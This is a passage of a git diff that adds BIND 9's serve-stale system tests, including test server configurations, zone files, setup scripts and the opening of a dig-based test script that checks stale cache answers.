primary; + file "root.db"; +}; diff --git a/bin/tests/system/serve-stale/ns1/named3.conf.in b/bin/tests/system/serve-stale/ns1/named3.conf.in new file mode 100644 index 0000000..23f1baa --- /dev/null +++ b/bin/tests/system/serve-stale/ns1/named3.conf.in @@ -0,0 +1,48 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion yes; + max-stale-ttl 20; + stale-answer-ttl 3; + stale-answer-enable yes; + stale-cache-enable yes; + stale-refresh-time 0; + servfail-ttl 0; +}; + +zone "." { + type primary; + file "root.db"; +}; + +zone "stale.test" { + type primary; + file "stale.test.db"; +}; diff --git a/bin/tests/system/serve-stale/ns1/root.db b/bin/tests/system/serve-stale/ns1/root.db new file mode 100644 index 0000000..aef8e31 --- /dev/null +++ b/bin/tests/system/serve-stale/ns1/root.db @@ -0,0 +1,18 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 300 SOA . . 0 0 0 0 0 +. 300 NS ns.nil. +ns.nil. 300 A 10.53.0.1 +example. 300 NS ns.example. +ns.example. 300 A 10.53.0.2 +slow. 300 NS ns.slow. +ns.slow. 300 A 10.53.0.2 diff --git a/bin/tests/system/serve-stale/ns1/stale.test.db b/bin/tests/system/serve-stale/ns1/stale.test.db new file mode 100644 index 0000000..d389e7c --- /dev/null +++ b/bin/tests/system/serve-stale/ns1/stale.test.db @@ -0,0 +1,19 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$ORIGIN stale.test. +stale.test. 300 SOA . . 0 0 0 0 0 +stale.test. 300 NS ns.stale.test. +ns.stale.test. 300 A 10.53.0.1 +cname1.stale.test. 1 CNAME a1.stale.test. +a1.stale.test. 1 A 192.0.2.1 +cname2.stale.test. 1 CNAME a2.stale.test. +a2.stale.test. 300 A 192.0.2.2 diff --git a/bin/tests/system/serve-stale/ns3/named1.conf.in b/bin/tests/system/serve-stale/ns3/named1.conf.in new file mode 100644 index 0000000..09ad864 --- /dev/null +++ b/bin/tests/system/serve-stale/ns3/named1.conf.in @@ -0,0 +1,39 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + dump-file "named_dump3.db"; +}; + +zone "." { + type secondary; + primaries { 10.53.0.1; }; + file "root.bk"; +}; diff --git a/bin/tests/system/serve-stale/ns3/named2.conf.in b/bin/tests/system/serve-stale/ns3/named2.conf.in new file mode 100644 index 0000000..a2b1d5a --- /dev/null +++ b/bin/tests/system/serve-stale/ns3/named2.conf.in @@ -0,0 +1,51 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Test default stale-answer-client-timeout value + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion yes; + stale-answer-enable yes; + stale-cache-enable yes; + stale-answer-ttl 3; + stale-refresh-time 0; + stale-answer-client-timeout 1800; + recursive-clients 10; # CVE-2022-3924 + max-stale-ttl 3600; + resolver-query-timeout 10; + qname-minimization disabled; +}; + +zone "." { + type hint; + file "root.db"; +}; diff --git a/bin/tests/system/serve-stale/ns3/named3.conf.in b/bin/tests/system/serve-stale/ns3/named3.conf.in new file mode 100644 index 0000000..2d2a250 --- /dev/null +++ b/bin/tests/system/serve-stale/ns3/named3.conf.in @@ -0,0 +1,48 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Test disable of stale-answer-client-timeout. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion yes; + stale-answer-enable yes; + stale-cache-enable yes; + stale-answer-ttl 3; + stale-refresh-time 0; + max-stale-ttl 3600; + resolver-query-timeout 10; +}; + +zone "." { + type hint; + file "root.db"; +}; diff --git a/bin/tests/system/serve-stale/ns3/named4.conf.in b/bin/tests/system/serve-stale/ns3/named4.conf.in new file mode 100644 index 0000000..d04b3aa --- /dev/null +++ b/bin/tests/system/serve-stale/ns3/named4.conf.in @@ -0,0 +1,50 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Test stale-answer-client-timeout 0. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion yes; + stale-answer-enable yes; + stale-cache-enable yes; + stale-answer-ttl 3; + stale-answer-client-timeout 0; + stale-refresh-time 0; + resolver-query-timeout 10; + max-stale-ttl 3600; + recursive-clients 10; +}; + +zone "." { + type hint; + file "root.db"; +}; diff --git a/bin/tests/system/serve-stale/ns3/named5.conf.in b/bin/tests/system/serve-stale/ns3/named5.conf.in new file mode 100644 index 0000000..35399b8 --- /dev/null +++ b/bin/tests/system/serve-stale/ns3/named5.conf.in @@ -0,0 +1,49 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Test stale-answer-client-timeout 0. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion yes; + stale-answer-enable yes; + stale-cache-enable yes; + stale-answer-ttl 3; + stale-answer-client-timeout 0; + stale-refresh-time 4; + resolver-query-timeout 10; + max-stale-ttl 3600; +}; + +zone "." { + type hint; + file "root.db"; +}; diff --git a/bin/tests/system/serve-stale/ns3/named6.conf.in b/bin/tests/system/serve-stale/ns3/named6.conf.in new file mode 100644 index 0000000..6e468d5 --- /dev/null +++ b/bin/tests/system/serve-stale/ns3/named6.conf.in @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion yes; + stale-answer-enable no; + stale-cache-enable yes; + stale-answer-ttl 3; + stale-refresh-time 4; + resolver-query-timeout 10; + fetches-per-zone 1 fail; + fetches-per-server 1 fail; + max-stale-ttl 3600; +}; + +zone "." { + type hint; + file "root.db"; +}; diff --git a/bin/tests/system/serve-stale/ns3/named7.conf.in b/bin/tests/system/serve-stale/ns3/named7.conf.in new file mode 100644 index 0000000..3e05341 --- /dev/null +++ b/bin/tests/system/serve-stale/ns3/named7.conf.in @@ -0,0 +1,55 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +/* + * Test serve-stale interaction with fetch-limits (dual-mode). + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + dnssec-validation no; + recursion yes; + /* + * stale-answer-enable is not strictly required because serving + * stale answers is enabled in the test via rndc. + */ + stale-answer-enable yes; + stale-cache-enable yes; + stale-answer-ttl 3; + stale-refresh-time 4; + resolver-query-timeout 10; + fetches-per-zone 1 fail; + fetches-per-server 1 fail; + max-stale-ttl 3600; +}; + +zone "." { + type secondary; + primaries { 10.53.0.1; }; + file "root.bk"; +}; diff --git a/bin/tests/system/serve-stale/ns3/named8.conf.in b/bin/tests/system/serve-stale/ns3/named8.conf.in new file mode 100644 index 0000000..a292b5a --- /dev/null +++ b/bin/tests/system/serve-stale/ns3/named8.conf.in @@ -0,0 +1,46 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.3; }; + listen-on-v6 { none; }; + recursion yes; + stale-answer-enable yes; + stale-cache-enable yes; + stale-answer-client-timeout 1800; + prefetch 2 8; + dns64 2001:aaaa::/96 { + clients { any; }; + mapped { any; }; + }; +}; + +zone "." { + type secondary; + primaries { 10.53.0.1; }; + file "root.bk"; +}; diff --git a/bin/tests/system/serve-stale/ns3/root.db b/bin/tests/system/serve-stale/ns3/root.db new file mode 100644 index 0000000..bbf039c --- /dev/null +++ b/bin/tests/system/serve-stale/ns3/root.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +. 300 NS ns.nil. +ns.nil. 300 A 10.53.0.1 diff --git a/bin/tests/system/serve-stale/ns4/named.conf.in b/bin/tests/system/serve-stale/ns4/named.conf.in new file mode 100644 index 0000000..13a6d1d --- /dev/null +++ b/bin/tests/system/serve-stale/ns4/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { none; }; + recursion yes; + dump-file "named_dump.db"; + stale-answer-enable no; +}; + +zone "." { + type secondary; + primaries { 10.53.0.1; }; + file "root.bk"; +}; diff --git a/bin/tests/system/serve-stale/ns5/named.conf.in b/bin/tests/system/serve-stale/ns5/named.conf.in new file mode 100644 index 0000000..9a6c444 --- /dev/null +++ b/bin/tests/system/serve-stale/ns5/named.conf.in @@ -0,0 +1,42 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.5 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.5; + notify-source 10.53.0.5; + transfer-source 10.53.0.5; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.5; }; + listen-on-v6 { none; }; + recursion yes; + dump-file "named_dump.db"; + stale-answer-enable yes; + stale-cache-enable no; + max-cache-ttl 24h; +}; + +zone "." { + type secondary; + masters { 10.53.0.1; }; + file "root.bk"; +}; diff --git a/bin/tests/system/serve-stale/prereq.sh b/bin/tests/system/serve-stale/prereq.sh new file mode 100644 index 0000000..b42a5ed --- /dev/null +++ b/bin/tests/system/serve-stale/prereq.sh @@ -0,0 +1,43 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +if $PERL -e 'use Net::DNS;' 2>/dev/null +then + if $PERL -e 'use Net::DNS; die if ($Net::DNS::VERSION >= 0.69 && $Net::DNS::VERSION <= 0.74);' 2>/dev/null + then + : + else + echo_i "Net::DNS versions 0.69 to 0.74 have bugs that cause this test to fail: please update." >&2 + exit 1 + fi +else + echo_i "This test requires the Net::DNS library." >&2 + exit 1 +fi +if $PERL -e 'use Net::DNS::Nameserver;' 2>/dev/null +then + : +else + echo_i "This test requires the Net::DNS::Nameserver library." >&2 + exit 1 +fi +if $PERL -e 'use Time::HiRes;' 2>/dev/null +then + : +else + echo_i "This test requires the Time::HiRes library." >&2 + exit 1 +fi diff --git a/bin/tests/system/serve-stale/setup.sh b/bin/tests/system/serve-stale/setup.sh new file mode 100644 index 0000000..7441e0c --- /dev/null +++ b/bin/tests/system/serve-stale/setup.sh @@ -0,0 +1,22 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named1.conf.in ns1/named.conf +copy_setports ns3/named1.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf +copy_setports ns5/named.conf.in ns5/named.conf diff --git a/bin/tests/system/serve-stale/tests.sh b/bin/tests/system/serve-stale/tests.sh new file mode 100755 index 0000000..d4a52e6 --- /dev/null +++ b/bin/tests/system/serve-stale/tests.sh @@ -0,0 +1,2621 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +RNDCCMD="$RNDC -c ../common/rndc.conf -p ${CONTROLPORT} -s" +DIG="$DIG +time=11" + +max_stale_ttl=$(sed -ne 's,^[[:space:]]*max-stale-ttl \([[:digit:]]*\).*,\1,p' $TOP_SRCDIR/bin/named/config.c) +stale_answer_ttl=$(sed -ne 's,^[[:space:]]*stale-answer-ttl \([[:digit:]]*\).*,\1,p' $TOP_SRCDIR/bin/named/config.c) + +status=0 +n=0 + +# +# First test server with serve-stale options set. +# +echo_i "test server with serve-stale options set" + +n=$((n+1)) +echo_i "prime cache longttl.example TXT ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 longttl.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache data.example TXT ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache othertype.example CAA ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nodata.example TXT ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$n +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "prime cache nxdomain.example TXT ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$n +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verify prime cache statistics ($n)" +ret=0 +rm -f ns1/named.stats +$RNDCCMD 10.53.0.1 stats > /dev/null 2>&1 +[ -f ns1/named.stats ] || ret=1 +cp ns1/named.stats ns1/named.stats.$n +# Check first 10 lines of Cache DB statistics. After prime queries, we expect +# two active TXT, one active Others, one nxrrset TXT, and one NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns1/named.stats.$n > ns1/named.stats.$n.cachedb || ret=1 +grep "1 Others" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "2 TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 !TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 NXDOMAIN" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"0\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +sleep 2 + +# Run rndc dumpdb, test whether the stale data has correct comment printed. +# The max-stale-ttl is 3600 seconds, so the comment should say the data is +# stale for somewhere between 3500-3599 seconds. +echo_i "check rndc dump stale data.example ($n)" +rndc_dumpdb ns1 || ret=1 +awk '/; stale/ { x=$0; getline; print x, $0}' ns1/named_dump.db.test$n | + grep "; stale data\.example.*3[56]...*TXT.*A text record with a 2 second ttl" > /dev/null 2>&1 || ret=1 +# Also make sure the not expired data does not have a stale comment. +awk '/; answer/ { x=$0; getline; print x, $0}' ns1/named_dump.db.test$n | + grep "; answer longttl\.example.*[56]...*TXT.*A text record with a 600 second ttl" > /dev/null 2>&1 || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "sending queries for tests $((n+1))-$((n+4))..." +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) & +$DIG -p ${PORT} @10.53.0.1 longttl.example TXT > dig.out.test$((n+2)) & +$DIG -p ${PORT} @10.53.0.1 othertype.example CAA > dig.out.test$((n+3)) & +$DIG -p ${PORT} @10.53.0.1 nodata.example TXT > dig.out.test$((n+4)) & +$DIG -p ${PORT} @10.53.0.1 nxdomain.example TXT > dig.out.test$((n+5)) + +wait + +n=$((n+1)) +echo_i "check stale data.example TXT ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*4.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check non-stale longttl.example TXT ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "longttl\.example\..*59[0-9].*IN.*TXT.*A text record with a 600 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale othertype.example CAA ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "othertype\.example\..*4.*IN.*CAA.*0.*issue" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nodata.example TXT ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "check stale nxdomain.example TXT ($n)" +ret=0 +grep "status: NXDOMAIN" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 0," dig.out.test$n > /dev/null || ret=1 +grep "example\..*4.*IN.*SOA" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +n=$((n+1)) +echo_i "verify stale cache statistics ($n)" +ret=0 +rm -f ns1/named.stats +$RNDCCMD 10.53.0.1 stats > /dev/null 2>&1 +[ -f ns1/named.stats ] || ret=1 +cp ns1/named.stats ns1/named.stats.$n +# Check first 10 lines of Cache DB statistics. After serve-stale queries, we +# expect one active TXT RRset, one stale TXT, one stale nxrrset TXT, and one +# stale NXDOMAIN. +grep -A 10 "++ Cache DB RRsets ++" ns1/named.stats.$n > ns1/named.stats.$n.cachedb || ret=1 +grep "1 TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #Others" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #!TXT" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +grep "1 #NXDOMAIN" ns1/named.stats.$n.cachedb > /dev/null || ret=1 +status=$((status+ret)) +if [ $ret != 0 ]; then echo_i "failed"; fi + +# Test stale-refresh-time when serve-stale is enabled via configuration. +# Steps for testing stale-refresh-time option (default). +# 1. Prime cache data.example txt +# 2. Disable responses from authoritative server. +# 3. Sleep for TTL duration so rrset TTL expires (2 sec) +# 4. Query data.example +# 5. Check if response come from stale rrset (4 sec TTL) +# 6. Enable responses from authoritative server. +# 7. Query data.example +# 8. Check if response come from stale rrset, since the query +# is within stale-refresh-time window. +n=$((n+1)) +echo_i "check 'rndc serve-stale status' ($n)" +ret=0 +$RNDCCMD 10.53.0.1 serve-stale status > rndc.out.test$n 2>&1 || ret=1 +grep '_default: on (stale-answer-ttl=4 max-stale-ttl=3600 stale-refresh-time=30)' rndc.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 1-3 done above. + +# Step 4. +n=$((n+1)) +echo_i "sending query for test ($n)" +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$n + +# Step 5. +echo_i "check stale data.example TXT (stale-refresh-time) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*4.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 6. +n=$((n+1)) +echo_i "enable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt enable > dig.out.test$n +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "TXT.\"1\"" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# Step 7. +echo_i "sending query for test $((n+1))" +$DIG -p ${PORT} @10.53.0.1 data.example TXT > dig.out.test$((n+1)) + +# Step 8. +n=$((n+1)) +echo_i "check stale data.example TXT comes from cache (stale-refresh-time) ($n)" +ret=0 +grep "status: NOERROR" dig.out.test$n > /dev/null || ret=1 +grep "ANSWER: 1," dig.out.test$n > /dev/null || ret=1 +grep "data\.example\..*4.*IN.*TXT.*A text record with a 2 second ttl" dig.out.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +# +# Test disabling serve-stale via rndc. +# +n=$((n+1)) +echo_i "disable responses from authoritative server ($n)" +ret=0 +$DIG -p ${PORT} @10.53.0.2 txt disable > 